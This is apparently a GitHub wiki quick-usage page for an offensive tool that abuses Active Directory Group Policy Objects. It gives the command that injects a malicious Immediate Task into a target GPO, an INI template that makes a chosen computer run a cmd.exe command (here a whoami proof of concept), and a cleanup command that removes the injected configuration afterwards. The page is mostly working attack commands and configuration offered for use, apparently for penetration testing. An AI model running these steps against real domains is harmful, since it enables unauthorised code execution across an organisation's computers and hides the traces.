Skip to content

02_Quick Usage

q-roland edited this page Aug 20, 2025 · 2 revisions

If you are in a rush, chances are that you simply want to exploit a GPO by injecting a malicious configuration into it.

Here is an example of a gpo > inject command that adds an Immediate Task to your target GPO:

$ python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'

The injected Immediate Task is described by the ImmediateTask_create.ini INI file, in which you provide its options. Several examples are provided in the modules_templates folder. If you want your Immediate Task to execute a cmd.exe command, and to only be deployed on the ad01-srv.corp.com computer:

[MODULECONFIG]
name = Scheduled Tasks
type = computer

[MODULEOPTIONS]
task_type = immediate
program = cmd.exe
arguments = /c "whoami > C:\Temp\poc.txt"

[MODULEFILTERS]
filters =
    [{
        "operator": "AND",
        "type": "Computer Name",
        "value": "ad01-srv1.corp.com"
    }]


Once you are finished (e.g. your Immediate Task was executed by the target), you may remove the injected configuration from the GPO by running the gpo > clean command, which takes the state_folder generated by the previous gpo > inject command.

$ python3 gpb.py gpo clean --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --state-folder 'state_folders/2025_07_15_075047'


For more complex exploitation scenarios and more details regarding the commands available to you, we encourage you to refer to the 03_Usage section. For more information regarding modules, available configurations for each of them, and filters options, see the 04_Modules and 05_Modules configurations sections.

Clone this wiki locally